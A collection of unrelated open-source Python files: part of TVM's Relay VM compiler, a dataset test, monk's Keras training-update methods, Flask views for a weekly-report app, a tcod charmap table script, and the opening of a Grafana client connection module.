params : dict of str to NDArray
Input parameters to the graph that do not change
during inference time. Used for constant folding.
"""
inputs = {}
for name, param in params.items():
if isinstance(param, np.ndarray):
param = _nd.array(param)
inputs[name] = _expr.const(param)
self._set_params_func(inputs)
def get_params(self):
"""Return the updated weights."""
params = self._get_params_func()
ret = {}
for key, value in params.items():
ret[key] = value.data
return ret
def lower(self, mod, target=None, target_host=None):
"""Lower the module to VM bytecode.
Parameters
----------
mod : tvm.IRModule
The Relay module to build.
target : any multi-target like object, see Target.canon_multi_target
For homogeneous compilation, the unique build target.
For heterogeneous compilation, a dictionary or list of possible build targets.
target_host : any target-like object, see Target.canon_target
Host compilation target, if target is device.
"""
raw_targets = Target.canon_multi_target_and_host(target, target_host)
tophub_context = self._tophub_context(raw_targets)
with tophub_context:
self._lower(mod, raw_targets)
def codegen(self):
"""Generate the kernel library."""
self._codegen()
def optimize(self, mod, target=None, target_host=None, params=None):
"""Helper method that optimizes a Relay module via VM.
Parameters
----------
mod : tvm.IRModule
target : any multi-target like object, see Target.canon_multi_target
For homogeneous compilation, the unique build target.
For heterogeneous compilation, a dictionary or list of possible build targets.
target_host : any target-like object, see Target.canon_target
Host compilation target, if target is device.
params : dict of str to NDArray
Input parameters to the graph that do not change
during inference time. Used for constant folding.
Returns
-------
mod : tvm.IRModule
The optimized relay module.
params : dict
The parameters of the final module.
"""
raw_targets = Target.canon_multi_target_and_host(target, target_host)
if params:
self.set_params(params)
return self._optimize(mod, raw_targets), self.get_params()
def get_exec(self):
"""Get the VM executable.
Returns
-------
exec : tvm.runtime.vm.Executable
The VM executable that contains both library code and bytecode.
"""
return vm_rt.Executable(self._get_exec())
def _tophub_context(self, raw_targets):
"""Get the autotvm context."""
# If current dispatch context is fallback context (the default root context),
# then load pre-tuned parameters from TopHub
if isinstance(autotvm.DispatchContext.current, autotvm.FallbackContext):
tophub_context = autotvm.tophub.context(raw_targets)
else:
tophub_context = autotvm.utils.EmptyContext()
return tophub_context
class VMExecutor(Executor):
"""
An implementation of the executor interface for
the Relay VM.
Useful interface for experimentation and debugging
the VM can also be used directly from the API.
supported by `tvm.runtime.vm`.
Parameters
----------
mod : :py:class:`~tvm.IRModule`
The module to support the execution.
device : :py:class:`~tvm.runtime.Device`
The runtime device to run the code on.
target : :py:class:`Target`
The target option to build the function.
"""
def __init__(self, mod, device, target):
if mod is None:
raise RuntimeError("Must provide module to get VM executor.")
self.mod = mod
self.device = device
self.target = target
self.executable = None
self.vm = None
def _make_executor(self, expr=None):
if expr:
self.mod["main"] = expr
self.executable = compile(self.mod, self.target)
self.vm = vm_rt.VirtualMachine(self.executable, self.device)
def _vm_wrapper(*args, **kwargs):
args = self._convert_args(self.mod["main"], args, kwargs)
return self.vm.run(*args)
return _vm_wrapper
|
tests/r/test_snow_dates.py | hajime9652/observations | 199 | 12739841 | <reponame>hajime9652/observations
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.snow_dates import snow_dates
def test_snow_dates():
"""Test module snow_dates.py by downloading
snow_dates.csv and testing shape of
extracted data has 44 rows and 3 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = snow_dates(test_path)
try:
assert x_train.shape == (44, 3)
except:
shutil.rmtree(test_path)
raise()
|
monk/tf_keras_1/finetune/level_13_updates_main.py | take2rohit/monk_v1 | 542 | 12739844 | from monk.tf_keras_1.finetune.imports import *
from monk.system.imports import *
from monk.tf_keras_1.finetune.level_12_losses_main import prototype_losses
class prototype_updates(prototype_losses):
'''
Main class for all parametric update functions
Args:
verbose (int): Set verbosity levels
0 - Print Nothing
1 - Print desired details
'''
@accepts("self", verbose=int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def __init__(self, verbose=1):
super().__init__(verbose=verbose);
##########################################################################################################################################################
@warning_checks(None, ["gte", 32, "lte", 1024], post_trace=False)
@error_checks(None, ["gt", 0], post_trace=False)
@accepts("self", int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_input_size(self, input_size):
'''
Update input size.
Args:
input_size (int): New input size
Returns:
None
'''
self.system_dict = set_input_size(input_size, self.system_dict);
self.custom_print("Update: Input size - {}".format(self.system_dict["dataset"]["params"]["input_size"]));
self.custom_print("");
@warning_checks(None, ["lte", 128], post_trace=False)
@error_checks(None, ["gt", 0], post_trace=False)
@accepts("self", int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_batch_size(self, batch_size):
'''
Update batch size.
Args:
batch_size (int): New batch size
Returns:
None
'''
self.system_dict = set_batch_size(batch_size, self.system_dict);
self.custom_print("Update: Batch size - {}".format(self.system_dict["dataset"]["params"]["batch_size"]));
self.custom_print("");
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_shuffle_data(self, shuffle):
'''
Update to shuffle data or not.
Args:
shuffle (bool): If True, will shuffle data
Returns:
None
'''
self.system_dict = set_data_shuffle(shuffle, self.system_dict);
self.custom_print("Update: Data shuffle - {}".format(self.system_dict["dataset"]["params"]["train_shuffle"]));
self.custom_print("");
@warning_checks(None, ["lte", psutil.cpu_count()], post_trace=False)
@error_checks(None, ["gt", 0], post_trace=False)
@accepts("self", int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_num_processors(self, num_processors):
'''
Update num processors for data loader.
Args:
num_processors (int): Max CPUs for data sampling
Returns:
None
'''
self.system_dict = set_num_processors(num_processors, self.system_dict);
self.custom_print("Update: Num processors - {}".format(self.system_dict["dataset"]["params"]["num_workers"]));
self.custom_print("");
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_weighted_sampling(self, sample):
'''
Function inactive
'''
self.system_dict = set_weighted_sampling(sample, self.system_dict);
self.custom_print("Update: Weighted Sampling - {}".format(self.system_dict["dataset"]["params"]["weighted_sample"]));
self.custom_print("");
@warning_checks(None, ["gt", 0.5, "lt", 1], post_trace=False)
@error_checks(None, ["gt", 0, "lt", 1], post_trace=False)
@accepts("self", float, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_trainval_split(self, value):
'''
Update training-validation split
Args:
split (float): Indicating train validation split
Division happens as follows:
train - total dataset * split * 100
val - total dataset * (1-split) * 100
Returns:
None
'''
if(self.system_dict["dataset"]["dataset_type"] == "train"):
dataset_path = self.system_dict["dataset"]["train_path"];
path_to_csv=False;
elif(self.system_dict["dataset"]["dataset_type"] == "train-val"):
dataset_path = [self.system_dict["dataset"]["train_path"], self.system_dict["dataset"]["val_path"]];
path_to_csv=False;
elif(self.system_dict["dataset"]["dataset_type"] == "csv_train"):
dataset_path = self.system_dict["dataset"]["train_path"];
path_to_csv = self.system_dict["dataset"]["csv_train"];
elif(self.system_dict["dataset"]["dataset_type"] == "csv_train-val"):
dataset_path = [self.system_dict["dataset"]["train_path"], self.system_dict["dataset"]["val_path"]];
path_to_csv = [self.system_dict["dataset"]["csv_train"], self.system_dict["dataset"]["csv_val"]];
else:
msg = "Dataset Type invalid.\n";
msg += "Cannot update split"
ConstraintsWarning(msg)
self.system_dict = set_dataset_train_path(self.system_dict, dataset_path, value, path_to_csv, self.system_dict["dataset"]["params"]["delimiter"]);
@warning_checks(None, dataset_path=None, split=["gt", 0.5, "lt", 1], path_to_csv=None, delimiter=None, post_trace=False)
@error_checks(None, dataset_path=["folder", 'r'], split=["gt", 0, "lt", 1], path_to_csv=["file", 'r'], delimiter=["in", [",", ";", "-", " "]], post_trace=False)
@accepts("self", dataset_path=[str, list], split=float, path_to_csv=[str, list, bool], delimiter=str, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_dataset(self, dataset_path=False, split=0.9, path_to_csv=False, delimiter=","):
'''
Update dataset path
Args:
dataset_path (str, list): Path to Dataset folder
1) Single string if validation data does not exist
2) List [train_path, val_path] in case of separate train and val data
path_to_csv (str, list): Path to csv file pointing towards images
1) Single string if validation data does not exist
2) List [train_path, val_path] in case of separate train and val data
value (float): Indicating train validation split
Division happens as follows:
train - total dataset * split * 100
val - total dataset * (1-split) * 100
delimiter (str): Delimiter for csv file
Returns:
None
'''
self.system_dict = set_dataset_train_path(self.system_dict, dataset_path, split, path_to_csv, delimiter);
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", str, force=bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_model_name(self, model_name, force=False):
'''
Update model name
Args:
model_name (str): Select from available models. Check via List_Models() function
force (bool): Dummy function
Returns:
None
'''
if(not force):
if(self.system_dict["training"]["status"]):
ConstraintWarning("Model trained using {}\n".format(self.system_dict["model"]["params"]["model_name"]));
ConstraintWarning("Changing the model will overwrite previously trained models if training is executed.\n");
inp = input("Do you wish to continue further (y/n):");
if(inp == "y"):
self.system_dict = set_model_name(model_name, self.system_dict);
self.custom_print("Update: Model name - {}".format(self.system_dict["model"]["params"]["model_name"]));
self.custom_print("");
else:
self.custom_print("Model not updated.");
self.custom_print("");
else:
self.system_dict = set_model_name(model_name, self.system_dict);
self.custom_print("Update: Model name - {}".format(self.system_dict["model"]["params"]["model_name"]));
self.custom_print("");
else:
self.system_dict = set_model_name(model_name, self.system_dict);
self.custom_print("Update: Model name - {}".format(self.system_dict["model"]["params"]["model_name"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", [str, list], force=bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_model_path(self, model_path, force=False):
'''
Update to use gpu or cpu
Args:
gpu (bool): If True, then use GPU
Returns:
None
'''
if(not force):
if(self.system_dict["training"]["status"]):
ConstraintWarning("Model trained using {}\n".format(self.system_dict["model"]["params"]["model_name"]));
ConstraintWarning("Changing the model will overwrite previously trained models if training is executed.\n");
inp = input("Do you wish to continue further (y/n):");
if(inp == "y"):
self.system_dict = set_model_path(model_path, self.system_dict);
self.custom_print("Update: Model path - {}".format(self.system_dict["model"]["params"]["model_path"]));
self.custom_print("");
else:
self.custom_print("Model not updated.");
self.custom_print("");
else:
self.system_dict = set_model_path(model_path, self.system_dict);
self.custom_print("Update: Model path - {}".format(self.system_dict["model"]["params"]["model_path"]));
self.custom_print("");
else:
self.system_dict = set_model_path(model_path, self.system_dict);
self.custom_print("Update: Model path - {}".format(self.system_dict["model"]["params"]["model_path"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_use_gpu(self, gpu):
'''
Update to use gpu or cpu
Args:
gpu (bool): If True, then use GPU
Returns:
None
'''
self.system_dict = set_device(gpu, self.system_dict);
self.custom_print("Update: Use Gpu - {}".format(self.system_dict["model"]["params"]["use_gpu"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_use_pretrained(self, pretrained):
'''
Update to use pretrained wights or randomly initialized weights
Args:
pretrained (bool): If True, use pretrained weights
else, use randomly initialized weights
Returns:
None
'''
self.system_dict = set_pretrained(pretrained, self.system_dict);
self.custom_print("Update: Use pretrained - {}".format(self.system_dict["model"]["params"]["use_pretrained"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_freeze_base_network(self, freeze):
'''
Update whether freeze base network or not
Args:
freeze (bool): If True, then base network is non-trainable, works as a feature extractor
Returns:
None
'''
self.system_dict = set_freeze_base_network(freeze, self.system_dict);
self.custom_print("Update: Freeze Base Network - {}".format(self.system_dict["model"]["params"]["freeze_base_network"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@error_checks(None, ["gte", 0], post_trace=False)
@accepts("self", int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_freeze_layers(self, num_freeze):
'''
Update to freeze certain layers in the network
Args:
num_freeze (int): Number of layers to freeze in network starting from top
Returns:
None
'''
self.system_dict["model"]["params"]["num_freeze"] = num_freeze;
self.custom_print("Update: Freeze layers - {}".format(self.system_dict["model"]["params"]["num_freeze"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@warning_checks(None, ["lt", 100], post_trace=False)
@error_checks(None, ["gt", 0], post_trace=False)
@accepts("self", int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_num_epochs(self, num_epochs):
'''
Update number of epochs to train the network
Args:
num_epochs (int): New number of epochs
Returns:
None
'''
self.system_dict = set_num_epochs(num_epochs, self.system_dict);
self.custom_print("Update: Num Epochs - {}".format(self.system_dict["hyper-parameters"]["num_epochs"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@warning_checks(None, ["lt", 1], post_trace=False)
@error_checks(None, ["gt", 0], post_trace=False)
@accepts("self", [int, float], post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_learning_rate(self, learning_rate):
'''
Update base learning rate for training
Args:
learning_rate (float): New base learning rate
Returns:
None
'''
self.system_dict["hyper-parameters"]["learning_rate"] = learning_rate;
self.system_dict["hyper-parameters"]["optimizer"]["params"]["lr"] = learning_rate;
self.custom_print("Update: Learning Rate - {}".format(self.system_dict["hyper-parameters"]["learning_rate"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_display_progress_realtime(self, value):
'''
Update display progress param
Args:
value (bool): If True, then real time progress is displayed
Returns:
None
'''
self.system_dict = set_display_progress_realtime(value, self.system_dict);
self.custom_print("Update: Display progress realtime - {}".format(self.system_dict["training"]["settings"]["display_progress_realtime"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_display_progress(self, value):
'''
Update display progress param
Args:
value (bool): If True, then per epoch progress is displayed
Returns:
None
'''
self.system_dict = set_display_progress(value, self.system_dict);
self.custom_print("Update: Display progress - {}".format(self.system_dict["training"]["settings"]["display_progress"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@error_checks(None, None, prefix=["name", ["A-Z", "a-z", "0-9", "-", "_"]], post_trace=False)
@accepts("self", bool, prefix=str, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_save_intermediate_models(self, value, prefix="intermediate_model_"):
'''
Update whether to save intermediate models or not
Args:
value (bool): If True, saves model weight post every epoch
prefix (str): Appends a prefix to intermediate weights
Returns:
None
'''
if(value):
if(not os.access(self.system_dict["model_dir"], os.W_OK)):
msg = "Folder \"{}\" has no read access".format(self.system_dict["model_dir"])
msg += "Cannot save Intermediate models";
raise ConstraintError(msg);
self.system_dict = set_save_intermediate_models(value, self.system_dict);
self.system_dict = set_intermediate_model_prefix(prefix, self.system_dict);
self.custom_print("Update: Save Intermediate models - {}".format(self.system_dict["training"]["settings"]["save_intermediate_models"]));
if(self.system_dict["training"]["settings"]["save_intermediate_models"]):
self.custom_print("Update: Intermediate model prefix - {}".format(self.system_dict["training"]["settings"]["intermediate_model_prefix"]));
self.custom_print("");
##########################################################################################################################################################
##########################################################################################################################################################
@accepts("self", bool, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def update_save_training_logs(self, value):
'''
Update whether to save training logs or not
Args:
value (bool): If True, saves all training and validation metrics. Required for comparison.
Returns:
None
'''
self.system_dict = set_save_training_logs(value, self.system_dict);
self.custom_print("Update: Save Training logs - {}".format(self.system_dict["training"]["settings"]["save_training_logs"]));
self.custom_print("");
##########################################################################################################################################################
|
deploy/app/report/views.py | mulsign/WeeklyReport | 131 | 12739855 | <gh_stars>100-1000
#coding:utf-8
from flask import render_template, redirect,request, url_for, \
current_app, flash, Markup
from flask_babelex import lazy_gettext as _
from flask_login import current_user
from datetime import datetime, timedelta, date
from . import report
from .forms import WriteForm, ReadDepartmentForm, \
ReadCrewForm, EmailReminderForm
from .. import db
from ..email import send_email
from ..models import Permission, User, Report, Department
from ..utils import get_week_count, permission_required, get_this_monday, \
get_last_week, get_last_week_start_at, get_last_week_end_at, get_last_week_content
@report.route('/write/', methods=['GET', 'POST'])
@permission_required(Permission.WRITE_REPORT)
def write():
form = WriteForm()
last_content_display = ""
report = Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count(),
year=datetime.today().year
).first()
last_report = Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count() - 1,
year=datetime.today().year
).first()
if form.submit.data and form.validate_on_submit():
if report:
report.content = form.body.data.replace('<br>', '')
report.last_content = form.last_content.data.replace('<br>', '')
db.session.add(report)
else:
report = Report(
content=form.body.data.replace('<br>', ''),
last_content=form.last_content.data.replace('<br>', ''),
author_id=current_user.id,
week_count=get_week_count(),
year=datetime.today().year)
db.session.add(report)
db.session.commit()
flash(_('Successfully submitted report'))
current_app.logger.info(
'{} submitted report'.format(current_user.email))
return redirect(url_for('report.write'))
if report:
form.body.data = report.content
else:
form.body.data = current_app.config['DEFAULT_CONTENT']
if last_report:
form.last_content.data = last_report.content
last_content_display = get_last_week_content(last_report.content)
return render_template('report/write.html',
form=form,
week_count=get_week_count(),
start_at=get_this_monday(),
end_at=get_this_monday()+timedelta(days=6),
last_content_display=last_content_display)
@report.route('/write/last_week', methods=['GET', 'POST'])
@permission_required(Permission.WRITE_REPORT)
def write_last_week():
form = WriteForm()
last_content_display = ""
report = Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count(get_last_week()),
year=get_last_week().year).first()
last_report = Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count(get_last_week()) - 1,
year=get_last_week().year).first()
if form.submit.data and form.validate_on_submit():
if report:
report.content = form.body.data.replace('<br>', '')
report.last_content = form.last_content.data.replace('<br>', '')
else:
report = Report(
content=form.body.data.replace('<br>', ''),
author_id=current_user.id,
week_count=get_week_count(get_last_week()),
year=get_last_week().year)
db.session.add(report)
db.session.commit()
flash(_('Successfully submitted report'))
current_app.logger.info(
"{} edited last week's report".format(current_user.email))
return redirect(url_for('report.write_last_week'))
if report:
form.body.data = report.content
else:
form.body.data = current_app.config['DEFAULT_CONTENT']
if last_report:
form.last_content.data = last_report.content
last_content_display = get_last_week_content(last_report.content)
return render_template('report/write.html',
form=form,
week_count=get_week_count(get_last_week()),
start_at=get_last_week_start_at(),
end_at=get_last_week_end_at() - timedelta(days=1),
last_content_display=last_content_display)
@report.route('/read/', methods=['GET'])
@report.route('/read/<int:page_count>', methods=['GET'])
@permission_required(Permission.WRITE_REPORT)
def read(page_count=1):
if not Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count(get_last_week()),
year=get_last_week().year).first():
flash(Markup(_("Do you want to <a href='/report/write/last_week'>"
"edit last week's report?</a>")))
pagination = Report.query.filter_by(author_id=current_user.id).order_by(
Report.year.desc()).order_by(Report.week_count.desc()).paginate(
page=page_count, per_page=current_app.config['PER_PAGE'])
if not Report.query.filter_by(
author_id=current_user.id,
week_count=get_week_count(),
year=datetime.today().year):
flash(_("You haven't submitted your weekly report"))
return render_template('report/read.html', pagination=pagination)
@report.route('/read/department/', methods=['GET', 'POST'])
@permission_required(Permission.READ_DEPARTMENT_REPORT)
def read_department():
form = ReadDepartmentForm()
user_choices = [('0', '*')]
user_choices.extend([(
str(user.id), user.username) for user in User.query.all()])
form.user.choices = user_choices
page = request.args.get('page', 1, type=int)
user_id = request.args.get('user', 0, type=int)
start_at = request.args.get('start_at', '', type=str)
end_at = request.args.get('end_at', '', type=str)
start_at = get_last_week_start_at() if not start_at \
else datetime.strptime(start_at[:10], '%Y-%m-%d')
end_at = date.today()+timedelta(hours=24) if not end_at \
else datetime.strptime(end_at[:10], '%Y-%m-%d')
form.start_at.data = start_at
form.end_at.data = end_at
form.user.data = str(user_id)
ids = [user.id for user in User.query.filter_by(
department_id=current_user.department_id)]
qst = Report.query.filter_by().filter(
Report.created_at.between(start_at, end_at)).filter(
Report.author_id.in_(ids))
if user_id:
qst = qst.filter_by(author_id=user_id)
if form.validate_on_submit():
pass
pagination = qst.filter_by().order_by(Report.year.desc()).order_by(
Report.week_count.desc()).order_by(Report.created_at.desc()).paginate(
page=page, per_page=current_app.config['PER_PAGE'])
return render_template('report/read_department.html',
form=form,
pagination=pagination)
@report.route('/read/crew/', methods=['GET', 'POST'])
@permission_required(Permission.READ_ALL_REPORT)
def read_crew():
form = ReadCrewForm()
user_choices = [('0', '*')]
department_choices = user_choices[:]
for dept in Department.query.all():
department_choices.extend([(str(dept.id), dept.name)])
user_choices.extend([(str(user.id), user.username) for user in
User.query.filter_by(department_id=dept.id)])
form.user.choices = user_choices
form.department.choices = department_choices
page = request.args.get('page', 1, type=int)
department_id = request.args.get('department', 0, type=int)
user_id = request.args.get('user', 0, type=int)
start_at = request.args.get('start_at', '', type=str)
end_at = request.args.get('end_at', '', type=str)
start_at = get_last_week_start_at() if not start_at \
else datetime.strptime(start_at[:10], '%Y-%m-%d')
end_at = date.today()+timedelta(hours=24) if not end_at \
else datetime.strptime(end_at[:10], '%Y-%m-%d')
form.start_at.data = start_at
form.end_at.data = end_at
form.user.data = str(user_id)
form.department.data = str(department_id)
qst = Report.query.filter_by().filter(
Report.created_at.between(start_at, end_at))
if department_id:
ids = [user.id for user in User.query.filter_by(
department_id=department_id)]
qst = qst.filter(Report.author_id.in_(ids))
if user_id:
qst = qst.filter_by(author_id=user_id)
if form.validate_on_submit():
pass
pagination = qst.filter_by().order_by(Report.year.desc()).order_by(
Report.week_count.desc()).order_by(Report.created_at.desc()).paginate(
page=page, per_page=current_app.config['PER_PAGE'])
return render_template('report/read_crew.html',
form=form,
pagination=pagination)
@report.route('/statistics/department/', methods=['GET'])
@permission_required(Permission.READ_DEPARTMENT_REPORT)
def statistics_department():
qst = Report.query.filter_by()
dept_users = [user for user in User.query.filter_by(
department_id=current_user.department_id) if not user.is_ignored]
ids = [user.id for user in dept_users]
if ids:
qst = qst.filter(Report.author_id.in_(ids))
else:
qst = qst.filter(False)
submitted_users = [
report.author for report in qst.filter_by(
week_count=get_week_count(),
year=datetime.today().year)]
unsubmitted_users = set(dept_users) - set(submitted_users)
data = {'已交': len(submitted_users),
'未交': len(unsubmitted_users)}
names = {'has_submitted': [user.username for user in submitted_users],
'not_yet': [user.username for user in unsubmitted_users]}
return render_template('report/statistics_department.html',
data=data,
names=names,
week_count=get_week_count(),
start_at=get_this_monday(),
end_at=get_this_monday() + timedelta(days=6))
@report.route('/statistics/department/last_week', methods=['GET'])
@permission_required(Permission.READ_DEPARTMENT_REPORT)
def statistics_department_last_week():
qst = Report.query.filter_by()
dept_users = [user for user in User.query.filter_by(
department_id=current_user.department_id) if not user.is_ignored]
ids = [user.id for user in dept_users]
if ids:
qst = qst.filter(Report.author_id.in_(ids))
else:
qst = qst.filter(False)
submitted_users = [
report.author for report in qst.filter_by(
week_count=get_week_count(get_last_week()),
year=get_last_week().year)]
unsubmitted_users = set(dept_users) - set(submitted_users)
data = {'已交': len(submitted_users),
'未交': len(unsubmitted_users)}
names = {'has_submitted': [user.username for user in submitted_users],
'not_yet': [user.username for user in unsubmitted_users]}
return render_template('report/statistics_department.html',
data=data,
names=names,
week_count=get_week_count(get_last_week()),
start_at=get_last_week_start_at(),
end_at=get_last_week_end_at() - timedelta(days=1))
@report.route('/statistics/crew/', methods=['GET', 'POST'])
@permission_required(Permission.READ_ALL_REPORT)
def statistics_crew():
stash = []
contrast = {}
reminder_emails = set()
form = EmailReminderForm()
for dept in Department.query.filter_by():
qst = Report.query.filter_by()
dept_users = [user for user in User.query.filter_by(
department_id=dept.id) if not user.is_ignored]
ids = [user.id for user in dept_users]
if ids:
qst = qst.filter(Report.author_id.in_(ids))
else:
qst = qst.filter(False)
submitted_users = [
report.author for report in qst.filter_by(
week_count=get_week_count(),
year=datetime.today().year)]
unsubmitted_users = set(dept_users)-set(submitted_users)
reminder_emails |= set([user.email for user in unsubmitted_users])
names = {'has_submitted': [user.username for user in submitted_users],
'not_yet': [user.username for user in unsubmitted_users]}
stash.append({'names': names,
'dept_name': dept.name})
contrast[dept.name] = len(dept_users) - len(submitted_users)
if form.validate_on_submit():
subject = 'Reminder of Report of week' + str(get_week_count()) + \
' From:' + str(get_this_monday()) + \
' To:' + str(get_this_monday() + timedelta(days=6))
send_email(reminder_emails, subject,
'email/reminder',
user=current_user,
week_count=get_week_count(),
start_at=get_this_monday(),
end_at=get_this_monday() + timedelta(days=6))
flash(_('Email has been sent to:') + '\n{}'.format(reminder_emails))
return render_template('report/statistics_crew.html',
contrast=contrast,
stash=stash,
week_count=get_week_count(),
form=form,
start_at=get_this_monday(),
end_at=get_this_monday() + timedelta(days=6))
@report.route('/statistics/crew/last_week', methods=['GET', 'POST'])
@permission_required(Permission.READ_ALL_REPORT)
def statistics_crew_last_week():
stash = []
contrast = {}
reminder_emails = set()
form = EmailReminderForm()
for dept in Department.query.filter_by():
qst = Report.query.filter_by()
dept_users = [user for user in User.query.filter_by(
department_id=dept.id) if not user.is_ignored]
ids = [user.id for user in dept_users]
if ids:
qst = qst.filter(Report.author_id.in_(ids))
else:
qst = qst.filter(False)
submitted_users = [
report.author for report in qst.filter_by(
week_count=get_week_count(get_last_week()),
year=get_last_week().year)]
unsubmitted_users = set(dept_users)-set(submitted_users)
reminder_emails |= set([user.email for user in unsubmitted_users])
names = {'has_submitted': [user.username for user in submitted_users],
'not_yet': [user.username for user in unsubmitted_users]}
stash.append({'names': names,
'dept_name': dept.name})
contrast[dept.name] = len(dept_users) - len(submitted_users)
if form.validate_on_submit():
subject = 'Reminder of Report of week' + str(get_week_count(get_last_week())) + \
' From:' + str(get_last_week_start_at()) + \
' To:' + str(get_last_week_end_at() - timedelta(days=1))
send_email(reminder_emails, subject,
'email/reminder',
user=current_user,
week_count=get_week_count(get_last_week()),
start_at=get_last_week_start_at(),
end_at=get_last_week_end_at() - timedelta(days=1))
flash(_('Email has been sent to:') + '\n{}'.format(reminder_emails))
return render_template('report/statistics_crew.html',
contrast=contrast,
stash=stash,
form=form,
week_count=get_week_count(get_last_week()),
start_at=get_last_week_start_at(),
end_at=get_last_week_end_at() - timedelta(days=1))
|
scripts/generate_charmap_table.py | hirnimeshrampuresoftware/python-tcod | 231 | 12739870 | #!/usr/bin/env python3
"""This script is used to generate the tables for `charmap-reference.rst`.
Uses the tabulate module from PyPI.
"""
import argparse
import unicodedata
from typing import Iterable, Iterator
from tabulate import tabulate
import tcod.tileset
def get_charmaps() -> Iterator[str]:
"""Return an iterator of the current character maps from tcod.tilest."""
for name in dir(tcod.tileset):
if name.startswith("CHARMAP_"):
yield name[len("CHARMAP_") :].lower()
def escape_rst(string: str) -> str:
"""Escape RST symbols and disable Sphinx smart quotes."""
return (
string.replace("\\", "\\\\")
.replace("*", "\\*")
.replace("|", "\\|")
.replace("`", "\\`")
.replace("'", "\\'")
.replace('"', '\\"')
)
def generate_table(charmap: Iterable[int]) -> str:
"""Generate and RST table for `charmap`."""
headers = ("Tile Index", "Unicode", "String", "Name")
table = []
for i, ch in enumerate(charmap):
hex_len = len(f"{ch:x}")
if hex_len % 2: # Prevent an odd number of hex digits.
hex_len += 1
try:
name = unicodedata.name(chr(ch))
except ValueError:
# Skip names rather than guessing, the official names are enough.
name = ""
string = escape_rst(f"{chr(ch)!r}")
table.append((i, f"0x{ch:0{hex_len}X}", string, name))
return tabulate(table, headers, tablefmt="rst")
def main() -> None:
parser = argparse.ArgumentParser(
description="Generate an RST table for a tcod character map.",
)
parser.add_argument(
"charmap",
action="store",
choices=list(get_charmaps()),
type=str,
help="which character map to generate a table from",
)
parser.add_argument(
"-o",
"--out-file",
action="store",
type=argparse.FileType("w", encoding="utf-8"),
default="-",
help="where to write the table to (stdout by default)",
)
args = parser.parse_args()
charmap = getattr(tcod.tileset, f"CHARMAP_{args.charmap.upper()}")
with args.out_file as f:
f.write(generate_table(charmap))
if __name__ == "__main__":
main()
|
grafana_dashboards/client/connection.py | Rvhappen/grafana-dashboard-builder | 131 | 12739876 | # -*- coding: utf-8 -*-
# Copyright 2015-2019 grafana-dashboard-builder contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import base64
import json
import logging
try:
from cookielib import CookieJar
except ImportError:
from http.cookiejar import CookieJar
try:
from urllib2 import build_opener, HTTPHandler, HTTPSHandler, HTTPCookieProcessor, HTTPDefaultErrorHandler, \
Request, BaseHandler
except ImportError:
from urllib.request import build_opener, HTTPHandler, HTTPSHandler, HTTPCookieProcessor, HTTPDefaultErrorHandler, \
Request, BaseHandler
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
import requests
from requests_kerberos import HTTPKerberosAuth
__author__ = '<NAME> <<EMAIL>>'
logger = logging.getLogger(__name__)
class BaseConnection(object):
_headers = {
'Content-type': 'application/json',
'Accept': 'application/json'
}
def __init__(self, host, auth_header, debug=0):
self._host = host
self._headers['Authorization'] = auth_header
self._opener = build_opener(HTTPHandler(debuglevel=debug),
HTTPSHandler(debuglevel=debug),
HTTPCookieProcessor(CookieJar()),
LoggingHandler(),
HTTPDefaultErrorHandler())
def make_request(self, uri, body=None):
request = Request('{0}{1}'.format(self._host, uri),
json.dumps(body).encode('utf-8') if body else None,
headers=self._headers)
response_body = self._opener.open(request).read()
return {} if (response_body is None or response_body == '') else json.loads(response_body)
class BasicAuthConnection(BaseConnection):
